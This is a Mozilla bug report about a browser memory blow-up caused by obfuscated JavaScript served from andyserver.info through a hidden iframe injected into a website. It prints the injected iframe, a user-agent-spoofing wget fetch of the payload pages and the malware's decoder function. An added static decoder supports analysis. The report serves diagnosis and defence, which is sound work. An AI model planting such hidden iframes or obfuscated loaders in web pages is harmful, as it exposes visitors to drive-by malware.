Closed
Bug 419159
Opened 16 years ago
Closed 13 years ago
Memory hog on some "web attack toolkit" on andyserver.info
Categories
(Core :: JavaScript Engine, defect)
RESOLVED
WORKSFORME
People
(Reporter: glandium, Unassigned)
Attachments
(1 file: 28.48 KB, application/x-gzip)
[Copy/pasted from http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=442201 ]

I'm seeing this bug using epiphany, but also with other related web browsers (firefox/iceweasel), so you'll probably want to pass it up the library chain.

Today something apparently changed on the sfreviews.net site, since when I visited it, epiphany began to use > 400 mb of memory and just sucked down more and more until things got ugly. It had been ok yesterday. I'm ccing its webmaster, since I trust him, and his normally well-behaved and informative site is doing something very wrong and strange.

The strange thing seems to be this, near the end of the sfreviews.net front page:

    <iframe name="3" src="http://andyserver.info/check/version.php?t=179" width=1 height=1 style="display:none"></iframe></body>

I don't know what this is there for, but it yields the file I've named "crashme.html" in the attached tarball. This is where things get dodgy, because andyserver.info appears to be a spyware domain (just google for it). It would be nice if attempted windows trojans didn't accidentally crash our web browsers..

crashme.html contains 9 more iframes named n1404-[1-9].htm. andyserver.info doesn't allow you to wget these unless you fool with the user-agent string and pretend to be a real web browser:

    joey@kodama:~>wget -U "Mozilla/5.0 (X11; U; Linux i686; en; rv:1.8.1.6) Gecko/20070801 (Debian-1.8.1.6-1) Epiphany/2.18" 'http://andyserver.info/check/n1404-8.htm'

Just loading n1404-3.htm causes epiphany to use 229 mb of memory. The others increase the memory usage by different amounts, apparently. When they're all loaded together as is done by the iframe in crashme.html, the result is not pretty.

These files are where things get really strange and ugly, since they consist of a pile of obfuscated javascript. The javascript can be decoded in 2 stages. First, replace the first "document.write" with "alert". This yields an alert box with the second-stage decoder:

    function twxcdimun(rrr){
      var temp="";
      document.write("------------");
      var ccc=0;
      var out="";
      var str=rrr;
      l=str.length;
      while(ccc<=str.length-1){
        while(str.charAt(ccc)!='N')temp=temp+str.charAt(ccc++);
        ccc++;
        out=out+String.fromCharCode(((parseInt(temp,16)-84)));
        temp="";
      }
      document.write(out);
    }

Then just replace the if block you modified before with the above code, and modify the new code s/document.write/alert/ again. This yields a new page with yet more javascript in it, I've not tried to work out what this second layer is supposed to do, although it does contain yet a third layer, encoded just as badly.

Workaround: Disable javascript :-/ or null-route andyserver.info
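The second-stage scheme quoted in the description (hex numbers terminated by 'N', each reduced by 84) can be decoded statically under Node.js, so the page never has to be rendered in a browser. This is an added example, not part of the bug report or of Mozilla's code; `findPayloads`, its literal-matching pattern and the sample string are assumptions constructed for illustration.

```javascript
// Added example: static decoder for the scheme used by twxcdimun() above.
// Nothing is evaluated or written to a document; output is returned as text.
const DELIMITER = 'N';
const OFFSET = 84;

function decodeStage(encoded, maxChars = 1000000) {
  const out = [];
  const errors = [];
  const tokens = encoded.split(DELIMITER);
  // A well-formed payload ends with the delimiter, leaving an empty tail.
  // The original loop never terminates on input that lacks it.
  const tail = tokens.pop();
  if (tail !== '') errors.push(`unterminated trailing token "${tail}"`);
  for (const [i, tok] of tokens.entries()) {
    if (out.length >= maxChars) { errors.push('output cap reached'); break; }
    // Stricter than parseInt(), which silently accepts "4fzz" as 0x4f.
    if (!/^[0-9a-fA-F]+$/.test(tok)) {
      errors.push(`token ${i} is not hex: "${tok}"`);
      continue;
    }
    const code = parseInt(tok, 16) - OFFSET;
    if (code < 0 || code > 0xffff) {
      errors.push(`token ${i} out of range: ${code}`);
      continue;
    }
    out.push(String.fromCharCode(code));
  }
  return { text: out.join(''), errors };
}

// Assumption: payloads sit in the page source as quoted string literals made
// only of hex digits and 'N'. The bug report does not show the call site.
function findPayloads(source) {
  const re = /(["'])((?:[0-9a-fA-F]+N){4,})\1/g;
  return [...source.matchAll(re)].map((m) => m[2]);
}

function analyze(source) {
  return findPayloads(source).map((p) => decodeStage(p));
}

// Constructed sample (not taken from andyserver.info): encodes "<p>ok</p>".
const SAMPLE_PAGE = 'twxcdimun("90Nc4N92Nc3NbfN90N83Nc4N92N");';
console.log(analyze(SAMPLE_PAGE));
```

Because the report says each decoded layer contains a further encoded layer, the returned `text` can be passed to `analyze` again; whether the inner layers use the same scheme has to be checked against the actual sample.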
Comment 1 • 16 years ago (Reporter)
FWIW, it seems to suck a bit less memory on Firefox 3.0b3
Updated • 16 years ago
Assignee: nobody → general
Component: General → JavaScript Engine
QA Contact: general → general
Comment 2 • 13 years ago (Reporter)
Looks like this doesn't suck memory anymore on aurora.
Status: NEW → RESOLVED
Closed: 13 years ago
Resolution: --- → WORKSFORME